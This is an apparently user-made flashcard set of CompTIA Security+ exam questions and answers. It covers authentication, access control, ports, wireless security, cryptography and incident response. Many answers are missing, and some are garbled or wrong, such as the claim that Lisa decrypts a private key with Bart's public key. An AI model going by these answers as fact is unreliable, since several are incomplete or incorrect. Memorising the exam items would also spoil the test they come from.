Comptia Security+ Exam
Terms in this set (749)
A security administrator is implementing a security program that addresses confidentiality and availability. What else should the administrator include?
Ensure systems are not susceptible to unauthorized changes
You need to transmit PII via email and you wan tot maintain its confidentiality. What should you do?
Encrypt it before sending
Lisa manages network devices in your organization and maintains copies of the configuration files for all the managed routers and switches. On a weekly basis, she creates hashes for these files and compares them with the hashes she created on the same files the previous week. Which security goal is she pursuing?
An organization wants to provide protection against malware attacks. Administrators have installed antivirus software on all computers. Additionally, they implemented a firewall and an IDS on the network. What identifies this principle?
Homer called into the help desk and says he forgot his password. What should the help-desk professional do after Homer has verified his identity?
Reset the password and configure the password to expire after the first use
Which type of authentication does a hardware token provide?
Which type of authentication is a retina scan?
Users are required to log on to their computers with a smart card and a PIN. Which describes this?
Your company recently began allowing workers to telecommute from home one or more days a week. However, your company doesn't currently have a remote access solution. They want to implement an AAA solution that supports different vendors. Which of the following is the BEST choice?
Your organization has implemented a system that stores user credentials in a central database. Users log on once with their credentials. They can then access other systems in the organization without logging on again. What does this describe?
Your organization issues users a variety of different mobile devices. However, management wants to reduce potential data losses if the devices are lost or stolen. Which of the following is the BEST technical control to achieve this goal?
Your primary job activities include monitoring security logs, analyzing trend reports, and installing CCTV systems. Which of the following choices BEST identifies your responsibilities?
Detecting security incidents and implementing monitoring controls
A security professional has reported an increase in the number of tailgating violations into a secure data center. What can prevent this?
You are redesigning your password policy. You want to ensure that users change their passwords regularly, but they are unable to reuse passwords. What settings should you configure?
Maximum password age, password history, and minimum password age
An outside security auditor recently completed an in-depth security audit on your network. One of the issues he reported was related to passwords. Specifically, he found the following passwords used on the network: Pa$$, 1@W2, and G7bT3. What should be changed to avoid the problem shown with these passwords?
A recent security audit discovered several apparently dormant user accounts. Although users could log on to the accounts, no one had logged on to them for more than 60 days. You later discovered that these accounts are for contractors who work approximately one week every quarter. What is the BEST response to this situation?
Disable the accounts
Your organization routinely hires contractors to assist with different projects. Administrators are rarely notified when a project ends and contractors leave. Which of the following is the BEST choice to ensure that contractors cannot log on with their account after they leave?
Enable account expiration
Developers are planning to develop an application using role-based access control. Which of the following would they MOST likely include in their planning?
A matrix of functions matched with their required privileges
An organization has implemented an access control model that enforces permissions based on data labels assigned at different levels. What type of model is this?
mandatory access control (MAC)
Your organization's security policy requires that PII data at rest and PII data in transit be encrypted. Of the following choices? what would the organization use to achieve these objectives?
Secure Shell (SSH) and Pretty Good Privacy / GNU Privacy Guard (PGP/GPG)
Which of the following list of protocols use TCP port 22 by default?
SSH, SCP, SFTP
Bart wants to block access to all external web sites. Which port should he block at the firewall?
You need to manage a remote server. Which of the following ports should you open on the firewall between your system and the remote server?
22 and 3389
While reviewing logs on a firewall, you see several requests for the AAAA record of gcgapremium.com. What is the purpose of this request?
To identify the IPv6 address of gcgapremium.com
While reviewing logs on a firewall, y ou see several requests for the "A" record of gcgapremium.com. What is the purpose of this request?
To identify the IPv4 address of gcgapremium.com
While reviewing logs on a firewall, y ou see several requests for the MX record of gcgapremium.com. What is the purpose of this request?
To identify the mail server for gcgapremium.com
While reviewing logs on a firewall, y ou see several requests for the CNAME record of gcgapremium.com. What is the purpose of this request?
To identify any aliases used by gcgapremium.com
Your organization has several switches used within the network. You need to implement a security control to secure the switch from physical access. What should you do?
Disable unused ports
You are configuring a switch and need to ensure that only authorized devices can connect to it and access the network through this switch. Which of the following is the BEST choice to meet this goal?
An ______________ server provides port-based authentication and can prevent unauthorized devices from connecting to a network.
__________________________ will prevent switching loop problems, but doesn't authenticate clients.
Rapid Spanning Tree Protocol (RSTP)
You need to configure a UTM security appliance to restrict access to peer-to-peer file sharing web sites. What are you MOST likely to configure?
Your organization has implemented a network design that allows internal computers to share one public IP address. Of the following choices, what did they MOST likely implement?
Port Address Translation (PAT)
Port Address Translation (PAT) is a form of __________________ and it allows many internal devices to share one public IP address.
Network Address Translation (NAT)
____________________________ uses multiple public IP addresses instead of just one.
Dynamic Network Address Translation (DNAT)
__________________________ secures transmissions for data in transit.
Transport Layer Security (TLS)
What would you configure on a Layer 3 device to allow FTP traffic to pass through?
Access Control List (ACL)
What type of device would have the following entries used to define its operation?
permit IP any any eq 80
permit IP any any eq 443
deny IP any any
You are preparing to deploy an anomaly-based detection system to monitor network activity. What would you create first?
A security company wants to gather intelligence about current methods attackers are using against its clients. What can it use?
________________ help protect against SYN flood attacks.
______________________ systems use signatures similar to antivirus software.
A __________________ is a server designed to look valuable to an attacker and can divert attacks.
Lisa oversees and monitors processes at a water treatment plant using SCADA systems. Administrators recently discovered malware on her system that was connected to the SCADA systems. Although they removed the malware, management is still concerned. Lisa needs to continue using her system and it's not possible to update the SCADA system. What can mitigate this risk?
Install a NIPS on the border of the SCADA network
Your organization maintains a separate wireless network for visitors in a conference room. However, you have recently noticed that people are connecting to this network even when there aren't any visitors in the conference room. You want to prevent these connections, while maintaining easy access for visitors in the conference room. Which of the following is the BEST solution?
Reduce antenna power
Which of the following represents the BEST action to increase security in a wireless network?
Replace Temporal Key Integrity Protocol (TKIP) with Counter Mode Cipher Block Chaining Message Authentication Code Protocol (CCMP)
Your organization is hosting a wireless network with an 802.1x server using Protected Extensible Authentication Protocol (PEAP). On Thursday, users report they can no longer access the wireless network. Administrators verified the network configuration matches the baseline, there aren't any hardware outages, and the wired network is operational. Which of the following is the MOST likely cause for this problem?
The RADIUS server certificate expired
You are planning a wireless network for a business. A core requirement is to ensure that the solution encrypts user credentials when users enter their usernames and passwords. Which of the following BEST meets this requirement?
WPA2 over EAP-TTLS
A small business owner modified his wireless router with the following settings:
After saving his settings, an employee reports that he cannot access the wireless network anymore. What is the most likely reason that the employee cannot access the network?
Hardware address filtering
___________________ filtering can block or allow access based on a device's MAC address, also known as the hardware address.
Homer recently implemented a wireless network in his home using WEP. He asks you for advice. Which of the following is the BEST advice you can give him?
He should not use WEP because it implements weak IVs for encryption keys
Which of the following is an attack against a mobile device?
A network administrator needs to open a port on a firewall to support a VPN using PPTP. What ports should the administrator open?
What protocol ID does IPsec use?
Attackers recently attacked a web server hosted by your organization. Management has tasked administrators with reducing the attack surface of this server to prevent future attacks. Which of the following will meet this goal?
Disabling unnecessary services
After disabling unnecessary services, what should you do next to reduce the attack surface of a web server?
Identify the baseline
Network administrators identified what appears to be malicious traffic coming from an internal computer, but only when no one is logged on to the computer. You suspect the system is infected with malware. It periodically runs an application that attempts to connect to web sites over port 80 with Telnet. After comparing the computer with a list of services from the standard image, you verify this application is very likely the problem. What process allowed you to make this determination?
An updated security policy defines what applications users can install and run on company-issued mobile devices. Which of the following technical controls will enforce this policy?
You want to test new security controls before deploying them. Which of the following technologies provides the MOST flexibility to meet this goal?
An organization recently suffered a significant outage after a technician installed an application update on a vital server during peak hours. The server remained down until administrators were able to install a previous version of the application on the server. What could the organization implement to prevent a re-occurrence of this problem?
Create a patch management policy
A ___________________ includes plans for identifying, testing, scheduling, and deploying updates.
Patch Management Policy
A security analyst is evaluating a critical industrial control system. The analyst wants to ensure the system has security controls to support availability. Which of the following will BEST meet this need?
Implementing control redundancy and diversity
Of the following choices, what are valid security controls for mobile devices?
Screen locks, device encryption, and remote wipe
A new mobile device security policy has authorized the use of employee-owned devices, but mandates additional security controls to protect them if devices are lost of stolen. Which of the following meets this goal?
Screen locks and device encryption
You want to deter an attacker from using brute force to gain access to a mobile device. What would you configure?
Account lockout settings
________________________ can be used for automated inventory control to detect movement of devices.
Radio-Frequency Identification (RFID)
Management within your company is considering allowing users to connect to the corporate network with their personally owned devices. Which of the following represents a security concern with this policy?
Inability to ensure devices are up to date with current system patches
Your organization is planning to issue mobile devices to some employees, but they are concerned about protecting the confidentiality of data if the devices are lost or stolen. Which of the following are the BEST way to secure data at rest on a mobile device?
Full device encryption
Your organization recently purchased several new laptop computers for employees. You're asked to encrypt the laptop's hard drives without purchasing any additional hardware. What would you use?
Trusted Platform Module (TPM)
Management within your organization wants to limit documents copied to USB flash drives. Which of the following can be used to meet this goal?
Data Loss Prevention (DLP)
Bart installed code designed to enable his account automatically, three days after anyone disables it. What does this describe?
A logic bomb is code that executes in response to an event. If the logic bomb is set to enable an account after it has been disabled, the logic bomb is creating a ______________________.
Lisa recently completed an application used by the Personnel department to store PII and other employee information. She programmed in the ability to access this application with a username and password that only she knows, so that she can perform remote maintenance on the application if necessary. What does this describe?
A recent change in an organization's security policy states that monitors need to be positioned so that they cannot be viewed from outside any windows. What is the purpose of this policy?
Reduce success of shoulder surfing
You are troubleshooting an intermittent connectivity issue with a web server. After examining the logs, you identify repeated connection attempts from various IP addresses. You realize these connection attempts are overloading the server, preventing it from responding to other connections. Which of the following is MOST likely occurring?
Your organization includes the following statement in the security policy:
"Security controls need to protect against both online and offline password brute force attacks."
Which of the following controls is the LEAST helpful to meet these goals?
__________________ helps protect against brute force attacks.
A code review of a web application discovered that the application is not performing boundary checking. What should the web developer add to this application to resolve this issue?
Input validation includes boundary or limit checking to validate data before using it. Proper input validation also prevents many problems such as cross-site request forgery (XSRF), ______________________, buffer overflow, and command injection attacks.
Cross-Site Scripting (XSS)
A web developer is using methods to validate user input in a web site application. This ensures the application isn't vulnerable to XSS, SQL Injection, Buffer Overflow, and Command Injection. What attack is not prevented by validating user input?
Checking the logs of a web server, you see the following entry:
22.214.171.124 --[1/Sep/2013:05:20]"GET /index.php?
"http://gcgapremium.com/security/" "Chrome3 1"
Which of the following is the BEST choice to explain this entry?
A buffer overflow attack
A _____________ attack uses specific SQL code, not random letters or characters.
A _______________ attack attempts to redirect users from one web site to another web site.
Looking at logs for an online web application, you see that someone has entered the following phrase into several queries:
Which of the following is the MOST likely explanation for this?
An SQL Injection attack
A security tester is using fuzzing techniques to test a software application. Which of the following does fuzzing use to test the application?
_____________________ sends random or unexpected input into an application to test the application's ability to handle it.
_______________attacks use formatted input.
An organization has purchased fire insurance to manage the risk of a potential fire. What method are they using?
___________________ attempts to discourage attacks with preventative controls such as a security guard.
____________________ reduces risks through internal controls.
You are asked to identify the number of times a specific type of incident occurs per year. Which of the following BEST identifies this?
Annual Rate of Occurrence (ARO)
__________________ identifies the expected monetary loss for an incident.
Annual Loss Expectancy (ALE)
_________________________ identifies the expected monetary loss for a single incident.
Single Loss Expectancy (SLE)
Security experts at your organization have determined that your network has been repeatedly attacked from multiple entities in a foreign country. Research indicates these are coordinated and sophisticated attacks. What BEST describes this activity?
Advanced Persistent Threat
Bart is performing a vulnerability assessment. Which of the following BEST represents the goal of this task?
Identify the system's security posture
You need to ensure that several systems have all appropriate security controls and patches. However, your supervisor specifically told you not to attack or compromise any of these systems. Which of the following is the BEST choice to meet these goals?
Which of the following tools is the MOST invasive type of testing?
__________________________ identifies hosts on a network.
A security professional is testing the functionality of an application, but does not have any knowledge about the internal coding of the application. What type of test is this tester performing?
Testers are analyzing the web application your organization is planning to deploy. They have full access to product documentation, including the code and data structures used by the application. What type of test will they MOST likely perform?
A network administrator is attempting to identify all traffic on an internal network. Which of the following tools is the BEST choice?
Your organization security policy requires that personnel notify security administrators if an incident occurs. However, this is not occurring consistently. Which of the following could the organization implement to ensure security administrators are notified in a timely manner?
A security administrator is reviewing an organization's security policy and notices that the policy does not define a time frame for reviewing user rights and permissions. Which of the following is the MINIMUM time frame that she should recommend?
At least one year
Security personnel recently performed a security audit. They identified several employees who had permissions for previously held jobs within the company. What should the organization implement to prevent this in the future?
Account Management Controls
A ____________________________ model uses group-based permissions, but it doesn't force administrators to take a user out of a security group when the user moves to a different job.
role-based access control (role-BAC)
You are a technician at a small organization. You need to add fault-tolerance capabilities within the business to increase the availability of data. However, you need to keep costs as low as possible. Which of the following is the BEST choice to meet these needs?
A ____________________ provides fault tolerance for servers and can increase data availability but is significantly more expensive than a RAID subsystem.
An organization needs to identify a continuity of operations plan that will allow it to provide temporary IT support during a disaster. The organization does not want to have a dedicated site. Which of the following provides the best solution?
Monty Burns is the CEO of the Springfield Nuclear Power Plant. What would the company have in place in case something happens to him?
A continuity of operations plan for an organization includes the use of a warm site. The BCP coordinator wants to verify that the organization's backup data center is prepared to implement the warm site if necessary. Which of the following is the BEST choice to meet this need?
Perform a disaster recovery exercise
Users are complaining of intermittent connectivity issues. When you investigate, you discover that new network cables for these user systems were run across several fluorescent lights. What environmental control will resolve this issue?
A software company occasionally provides application updates and patches via its web site. It also provides a checksum for each update and patch. Which of the following BEST describes the purpose of the checksum?
Integrity of updates and patches
The checksum (also known as a ____________) provides integrity for patches and updates so users can verify they have not been modified.
Humidity controls provide protection against condensation and ___________.
Electro-Static Discharge (ESD)
A function converts data into a string of characters and the string of characters cannot be reversed to re-create the original data. What type of function is this?
A hash function is typically displayed in a _____________________.
_____________________ (including symmetric, asymmetric, and stream ciphers) create ciphertext from plain-text data, but they include decryption algorithms to re-create the original data.
Which of the following is a symmetric encryption algorithm that encrypts data one bit at a time and is more efficient when the size of the data is unknown, such as streaming audio or video?
A ______________________ (such as AES and DES) encrypts data in specific-sized blocks, such as 64-bit blocks or 128-bit blocks.
____________________ is a hashing algorithm.
A supply company has several legacy systems connected together within a warehouse. An external security audit discovered the company is using DES and mandated the company upgrade DES to meet minimum security requirements. The company plans to replace the legacy systems next year, but needs to meet the requirements from the audit. Which of the following is the MOST likely to be the simplest upgrade for these systems.?
Network administrators in your organization need to administer firewalls, security appliances, and other network devices. These devices are protected with strong passwords, and the passwords are stored in a file listing these passwords. Which of the following is the BEST choice to protect this password list?
Bart, an employee at your organization, is suspected of leaking data to a competitor. Investigations indicate he sent several email messages containing pictures of his dog. Investigators have not been able to identify any other suspicious activity. Which of the following is MOST likely occurring?
Bart is leaking data using steganography
You are planning to encrypt data in transit with IPsec. Which of the following is MOST likely to be used with IPsec?
Hash-based Message Authentication Code (HMAC)
_____________________ mandates the use of HMAC for authentication and integrity when encrypting data in transit with IPsec.
When encryption is used, RFC 4835 mandates the use of either ________________.
AES or 3DES
Bart wants to send a secure email to Lisa, so he decides to encrypt it. He wants to ensure that only Lisa can decrypt it. What does Lisa need to meet this requirement?
Lisa's Private Key
Bart wants to send a secure email to Lisa, so he decides to encrypt it. What would Bart use to encrypt the email?
Lisa's Public Key
Bart wants to send a secure email to Lisa. If Bart wanted Lisa to have verification that he sent it, what would he do?
Create a digital signature with his private key
If Bart sent a secure email to Lisa and created a digital signature with his private key so Lisa would have verification that he sent it, how would Lisa decrypt it?
Lisa would decrypt the private key with Bart's public key
An organization requested bids for a contract and asked companies to submit their bids via email. After winning the bid, Acme realized it couldn't meet the requirements of the contract. Acme instead stated that it never submitted the bid. Which of the following would provide proof to the organization that Acme did submit the bid?
_____________ provide verification of who sent a message, non-repudiation preventing them from denying it, and integrity verifying the message wasn't modified.
Application developers are creating an application that requires users to log on with strong passwords. The developers want to store the passwords in such a way that it will thwart brute force attacks. Which of the following is the BEST solution?
Password-Based Key Derivation Function 2 (PBKDF2)
Password-Based Key Derivation Function 2 (PBKDF2) is a ________________ technique designed to protect against brute force attempts.
Password-Based Key Derivation Function 2 (PBKDF2) and bcrypt _______________ the password with additional bits.
Passwords stored using _____________________ are easy to crack because they don't use salts.
A web site is using a certificate. Users have recently been receiving errors from the web site indicating that the web site's certificate is revoked. Which of the following includes a list of certificates that has been revoked.
Certificate Revocation List (CRL)
A Certificate Revocation List (CRL) is a list of certificates that a ___________________ has revoked.
Certificate Authority (CA)
The __________________________ validates trust with certificates, but only returns short responses such as good, unknown, or revoked.
Online Certificate Status Protocol (OCSP)
A ___________________________ is used to request certificates.
Certificate Signing Request (CSR)
Which of the following is a management control?
Written security policies are ___________________.
Encryption and principle of least privilege are ______________.
Change management is an ______________________.
Security personnel recently identified potential fraud committed by a network administrator. Investigators discovered this administrator performs several job functions within the organization, including database administration and application development. Which of the following is the BEST solution to reduce risk associated with this activity?
Separation of Duties
A __________________________ policy is useful to discover fraud committed by an individual.
__________________________ ensures changes are reviewed before being implemented.
Security experts want to reduce risks associated with updating critical operating systems. Which of the following will BEST meet this goal?
Your company is considering implementing SSO capabilities to company applications and linking them to a social media site. When implemented, users can log on to Facebook and then access company applications without logging on again. What is a potential risk related to this plan?
A data breach exposing passwords on the social media site will affect the company application.
You work as a help-desk professional in a large organization. You have begun to receive an extraordinary number of calls from employees related to malware. Using common incident response procedures, what should be your FIRST response?
In Incident Response procedures, the __________________ phase is performed before the incident, and includes steps to prevent incidents.
After identifying an incident is valid, the next step is ________________ and notification and then mitigation steps.
A technician confiscated an employee's computer after management learned the employee had unauthorized material on his system. Later, a security expert captured a forensic image of the system disk. However, the security expert reported the computer was left unattended for several hours before he captured the image. Which of the following is a potential issue if this incident goes to court?
Chain of Custody
Social engineers have launched several successful phone-based attacks against your organization resulting in several data leaks. Which of the following would be the MOST effective at reducing the success of these attacks?
Implement a program to increase security awareness.
Homer needs to send an email to his HR department with an attachment that includes PII. He wants to maintain the confidentiality of this attachment. Which of the following choices is the BEST choice to meet his needs?
Hashing, digital signatures, and certificates all provide integrity, but not ____________________.
You want to ensure that messages sent from administrators to managers arrive unchanged. Which security goal are you addressing?
Integrity provides assurances that data has not been modified and is commonly enforced with ________________.
___________________________ prevents unauthorized disclosure of data but does not address modifications of data.
_________________________ ensures systems are up and operational when needed and uses fault tolerance and redundancy methods.
____________________ provides proof that users are who they say they claim to be.
Your organization recently implemented two servers that act as failover devices for each other. Which security goal is your organization pursuing?
A ____________________ uses redundant servers to ensure a service will continue to operate even if one of the servers fail.
______________________ provide safety for personnel and other assets.
________________________ ensure that data has not been modified.
____________________ such as encryption, prevent the unauthorized disclosure of data.
Management at your company recently decided to implement additional lighting and fencing around the property. Which security goal is your company MOST likely pursuing?
Confidentiality is enhanced with encryption and ________________.
Integrity is enhanced with _________________________.
hashing, certificates and digital signatures
Availability is enhanced with ___________________________ procedures.
redundancy and fault-tolerance
You are logging on to your bank's web site using your email address and password. What is the purpose of the email address in this example?
You are logging on to your bank's web site using your email address and password. What does the password combined with the email provide?
Your organization has a password policy with a password history value of 12. What does this indicate?
Twelve different passwords must be used before reusing the same password.
Password _________________________ identifies the length of time that must pass before users can change a password again.
A user calls into the help desk and asks the help-desk professional to reset his password. Which of the following choices is the BEST choice for what the help-desk professional should do before resetting the password?
Verify the user's identity.
Your organization is planning to implement remote access capabilities. Management wants strong authentication and wants to ensure that passwords expire after a predefined time interval. Which of the following choices BEST meets this requirement?
Time-Based One-Time Password (TOTP)
Which type of authentication is a fingerprint scan?
When users log on to their computers, they are required to enter a username, a password, and a PIN. Which of the following choices BEST describes this?
_____________________________ is when both entities in the authentication process authenticate with each other.
The security manager at your company recently updated the security policy. One of the changes requires dual-factor authentication. Which of the following will meet this requirement?
Hardware Token and PIN
Your network infrastructure requires users to authenticate with something they are and something they know. Which of the following choices BEST describes this authentication method?
_______________________ is a remote access authentication service that supports Extensible Authentication Protocol (EAP).
Which of the following authentication services uses tickets for user credentials?
A network includes a ticket-granting ticket server. Which of the following choices is the primary purpose of this server?
Your network uses an authentication service based on the X.500 specification. When encrypted, it uses TLS. Which authentication service is your network using?
Lightweight Directory Access Protocol (LDAP)
Security Assertion Markup Language (SAML) is an Extensible Markup Language (XML) used for ________________________.
Single Sign-On (SSO)
When you log on to your online bank account, you are also able to access a partner's credit card site, check-ordering services, and a mortgage site without entering your credentials again. What does this describe?
Your organization recently made an agreement with third parties for the exchange of authentication and authorization information. The solution uses an XML-based open standard. Which of the following is the MOST likely solution being implemented?
Terminal Access Controller Access-Control System Plus (TACACS+) is an ___________________ that replaces the older TACACS protocol.
Which of the following provides authentication services and uses PPP?
PAP and CHAP
Users in your organization access your network from remote locations. Currently, the remote access solution uses RADIUS. However, the organization wants to implement a stronger authentication service that supports Extensible Authentication Protocol (EAP). Which of the following choices BEST meets this goal?
What provide authentication services for remote users and devices?
RADIUS and Diameter
Which of the following accurately identifies the primary security control classifications?
Technical, Management, and Operational
________________________ are role-based, rule-based, mandatory, and discretionary.
Access Control Methods
You need to reduce the attack surface of a web surface. Which of the following is a preventative control that will assist with this goal?
Disabling unnecessary services
Initial _______________________ is useful to determine the security posture of a system, but doesn't prevent attacks.
A security expert is identifying and implementing several different physical deterrent controls to protect an organization's server room. Which of the following choices would BEST meet this objective?
Using hardware locks
_______________________ is a technical control designed to protect data.
You need to secure access to a data center. Which of the following choices provides the BEST physical security to meet this need?
Biometrics, CCTV, and Mantrap
A security professional needs to identify a physical security control that will identify and authenticate individuals before allowing them to pass, and restrict passage to a single person at a time. What should the professional recommend?
Your company wants to control access to a restricted area of the building by adding an additional physical security control that includes facial recognition. Which of the following provides the BEST solution?
________________________ are effective barricades to block vehicles.
Employees access a secure area by entering a cipher code, but this code does not identify individuals. After a recent security incident, management has decided to implement a key card system that will identify individuals who enter and exit this secure area. However, the installation might take six months or longer. Which of the following choices can the organization install immediately to identify individuals who enter or exit the secure area?
Thieves recently rammed a truck through the entrance of your company's main building. During the chaos, their partners proceeded to steal a significant amount of IT equipment. Which can you do to prevent this from happening again?
You maintain a training lab with 18 computers. You have enough rights and permissions on these machines so that you can configure them as needed for classes. However, you do not have the rights to add them to your organization's domain. Which of the following choices BEST describes this example?
Developers in your organization have created an application designed for the sales team. Salespeople can log on to the application using a simple password of 1234. However, this password does not meet the organization's password policy. What is the BEST response by the security administrator after learning about this?
Direct the application team manager to ensure the application adheres to the organization's password policy.
You are redesigning your password policy to increase the security of the passwords. Which of the following choices provides the BEST security?
Password complexity and length
A company's account management policy dictates that administrators should disable user accounts instead of deleting them when an employee leaves the company. What security benefit does this provide?
Ensures that user keys are retained
Disabling an account instead of deleting it, helps ensure that access to files is retained, but does not directly retain _________________.
You need to create an account for a contractor who will be working at your company for 90 days. Which of the following is the BEST security step to take when creating this account?
Configure an expiration date on the account
You're asked to identify who is accessing a spreadsheet containing employee salary data. Detailed logging is configured correctly on this file. However, you are unable to identify a specific person who is accessing the file. What is the MOST likely reason?
Shared accounts are not prohibited.
When shared accounts are not prohibited, ________________are allowed to access the same file. For example, if the Guest account is enabled and used as a shared account by all users, the logs will indicate the Guest account accessed the file, but won't identify specific individuals.
Members of a project team came in on the weekend to complete some work on a key project. However, they found that they were unable to access any of the project data. Which of the following choices is the MOST likely reason why they can't access this data?
Time-of-day access control
An administrator needs to grant users access to different servers based on their job functions. Which access control model is the BEST choice to use?
Role-based access control
A ___________________________________ specifies that every object has an owner and owners have full control over objects.
discretionary access control
______________________________ uses labels and a lattice to grant access rather than job functions.
Mandatory access control
A ________________________________ model uses rules that trigger in response to events.
rule-based access control
Interns from a local college frequently work at your company. Some interns work with the database developers, some interns work with the web application developers, and some interns work with both developers. Interns working with the database developers require specific privileges, and interns working with the web application developers require different privileges. What is the simplest method to meet these requirements?
Use group-based privileges
Your organization wants to reduce the administrative workload related to account management. Which of the following is the BEST choice?
Implement group-based privileges
___________________________ are extremely tedious and time consuming because privileges are assigned to all users individually.
Bart has read access to an accounting database and Lisa has both read and write access to this database. A database application automatically triggers a change in permissions so that Bart has both read and write access when Lisa is absent. What type of access control system is in place?
Rule-based Access Control System (Rule-BAC)
The ______________________ model uses labels to identify users and data, and is used in systems requiring a need to know.
Mandatory Access Control (MAC)
Your organization hosts several classified systems in the data center. Management wants to increase security with these systems by implementing two-factor authentication. Management also wants to restrict access to these systems to employees who have a need to know. Which of the following choices should management implement for authorization?
Mandatory Access Control (MAC)
What protocol does IPv6 use for hardware address resolution?
Neighbor Discovery Protocol (NDP)
What protocol does IPv4 use for hardware address resolution?
Address Resolution Protocol (ARP)
_______________________ is used to connect to remote systems over port TCP 3389.
Remote Desktop Protocol (RDP)
______________________ is used to monitor and manage network devices.
Simple Network Management Protcol (SNMP)
What protocol does IPv6 use for hardware address resolution?
What is the default port for SSH?
You are configuring a host-based firewall so that it will allow SFTP connections. Which of the following is required?
Allow TCP 22
You need to send several large files containing proprietary data to a business partner. Which of the following is the BEST choice for this task?
Your organization is planning to establish a secure link between one of your mail servers and a business partner's mail server. The connection will use the Internet. What protocol is the BEST choice?
Transport Layer Security (TLS) is a good protocol choice to create a _____________ between two systems over the Internet.
You recently learned that a network router has TCP ports 22 and 80 open, but the organization's security policy mandates that these should not be accessible. What should you do?
Disable the SSH and HTTP services on the router
You need to prevent the use of Trivial File Transfer Protocol (TFTP) through your firewall. Which port would you block?
You need to enable the use of Network Basic Input/Output System (NetBIOS) through a firewall. Which ports should you open?
137 through 139
Lisa wants to manage and monitor the switches and routers in her network. Which of the following protocols would she use?
System Network Management Protocol (SNMP) monitors and manages ______________.
You need to divide a single Class B IP address range into several ranges. What would you do?
Subnet the Class B IP address range.
You need to reboot your DNS server. Of the following choices (Unix server, Apache server, BIND server or Web server), which type of server are you MOST likely to reboot?
The Berkeley Internet Name Domain (BIND) is a type of ___________ commonly used on the Internet and in some internal networks.
Your organization is increasing security and wants to prevent attackers from mapping out the IP addresses used on your internal network. Which of the following choices is the BEST option?
Implementing secure zone transfers.
Implementing secure zone transfers on ___________ prevents attackers from downloading zone data and mapping out IP addresses and devices.
internal DNS servers
A ___________________ protects a web server.
Web Application Firewall (WAF)
DNS name resolution queries use UDP port 53, blocking ___________ on UDP port 53 would prevent internal users from using DNS on the internet.
A network technician incorrectly wired switch connections in your organization's network. It effectively disabled the switch as though it was a victim of a denial-of-service attack. What should be done to prevent this in the future?
Implement STP or RSTP
___________ will prevent switching loop problems. If two ports on a switch are connected to each other, it creates a switching loop and effectively disables the switch.
Spanning Tree Protocol (STP) or Rapid STP
Your organization frequently has guests visiting in various conference rooms throughout the building. These guests need access to the Internet via wall jacks, but should not be able to access internal network resources. Employees need access to both the internal network and the Internet. What would BEST meet this need?
VLANs and 802.1x
An ___________ provides port-based authentication and can authenticate clients. Clients that cannot authenticate can be redirected to a virtual local area network (VLAN) that grants them Internet access, but not access to an internal network.
Your organization wants to prevent users from accessing file sharing web sites. Which of the following choices meet this need?
Proxy servers and ___________devices include URL filters.
unified threat management (UTM)
___________ include content inspection to identify and filter out different types of files and traffic, and malware inspection to identify and block malware.
Your organization wants to combine some of the security controls used on the network. What could your organization implement to meet this goal?
A UTM device combines ___________ into a single device.
multiple security controls
Your organization hosts a web server and wants to increase its security. You need to separate all web-facing traffic from internal network traffic. Which of the following provides the BEST solution?
You can use a ___________ to group computers together based on job function or some other administrative need. It is created on switches in the internal network.
Network administrators connect to a legacy server using Telnet. They want to secure these transmissions using encryption at a lower layer of the OSI model. What could they use?
IPv6 includes the use of ___________ which operates on Layer 3 of the OSI reference model.
Internet Protocol security (IPsec)
Which of the following operates on the HIGHEST layer of the OSI model, and is the most effective at blocking application attacks?
web application firewall (WAF)
A web application firewall (WAF) operates on multiple layers up to Layer 7 of the OSI reference model and blocks attacks against a ___________.
An ___________ operates on multiple layers up to Layer 7 of the OSI model; however it is more effective at detecting attacks than blocking them.
A router operates on ___________ of the OSI model and it can perform packet filtering.
A ___________ only performs packet filtering and isn't effective against Application layer attacks.
Your network currently has a dedicated firewall protecting access to a web server. It is currently configured with the following two rules in the ACL along with an implicit allow rule at the end:
PERMIT TCP ANY ANY 443
PERMIT TCP ANY ANY 80
You have detected DNS requests and zone transfer requests coming through the firewall and you need to block them. Which of the following would meet this goal?
Add the following rule to the firewall: DENY IP ALL ALL 53 and Change the implicit allow rule to implicit deny.
Your organization hosts three wireless networks for different purposes. A recent site survey audit discovered the information shown in the following table:
SSID Security Channel Power
GetCertifiedVisitors WPA2 1 71dBm
GetCertifiedEmployee WPA2 2 94dBm
GetCertifiedEmployees WPA2 3 73dBm
GetCertifiedKiosk WPA2 5 79dBm
What does this indicate?
Rogue access point
Which of the following network tools includes sniffing capabilities allowing them to inspect packet streams for malicious activity?
A __________ provides access to a wired network for wireless devices.
wireless access point (WAP)
A __________ system inspects clients to ensure they meet minimum security requirements.
network access control (NAC)
A HIDS reported a vulnerability on a system using an assigned vulnerability identification number. After researching the number on the vendor's web site, you identify the recommended solution and begin applying it. What type of HIDS is in use?
A _____________-, anomaly-, or behavior-based detection system catches issues that are not previously known. It compares current activity with a previously created baseline to detect any anomalies or changes.
Management is concerned about malicious activity on your network and wants to implement a security control that will detect unusual traffic on the network. Which of the following is the BEST choice to meet this goal?
Administrators have noticed an increased workload recently. Which of the following can cause an increased workload from incorrect reporting because they falsely indicate an alert has occurred?
A ___________ doesn't report an actual attack, so administrators are unaware of an attack.
A security company wants to identify and learn about current and new attack methodologies. Which of the following is the BEST choice to meet this objective?
A honeypot is a server designed to look valuable to an attacker and can help administrators learn about ___________, or previously unknown attacks.
Of the following choices, what can you use to divert malicious attacks on your network from valuable data to worthless fabricated data?
A ___________ can filter and cache content from web pages.
Your network IDS recently detected an attack on a server. Upon investigation, you discover that the IDS does not have a signature on this attack. Instead, the IDS detected it using a heuristic analysis. Of the following choices, what is the MOST likely category of this attack?
Definition-based IDS are the same as signature-based IDS. Many signatures are based on the ___________ list.
Common Vulnerabilities and Exposures (CVE)
You need to provide connectivity between two buildings without running any cables. You decide to use two WAPs and a high-gain directional antenna. Which of the following antennas is the BEST choice to meet this need?
A ___________ is a high-gain directional antenna with a very narrow radiation pattern.
An ___________ is theoretical and indicates the signal goes in all directions equally.
___________ attempt to mimic an isotropic antenna, but have stronger gains horizontally then vertically, assuming they are standing vertically.
Omnidirectional and dipole antennas
You are assisting a user implement a wireless network in his home. The wireless hardware he has requires the RC4 protocol. What type of security is BEST for this network?
Temporal Key Integrity Protocol (TKIP) uses ___________ and is compatible with older hardware such as Wi-Fi Protected Access (WPA).
Wi-Fi Protected Access (WPA) and ______________ use RC4; however, the latter is not secure and should not be used.
Wired Equivalent Privacy (WEP)
______________ is stronger than WPA-TKIP, but it uses AES instead of RC4.
______________ requires an 802.1x server and it does not use RC4.
Wi-Fi Protected Access II (WPA2)
You want to implement a STRONG level of security on a wireless network. Which of the following supports this goal?
You are planning to deploy a WLAN and you want to ensure it is secure. Which of the following provides the BEST security?
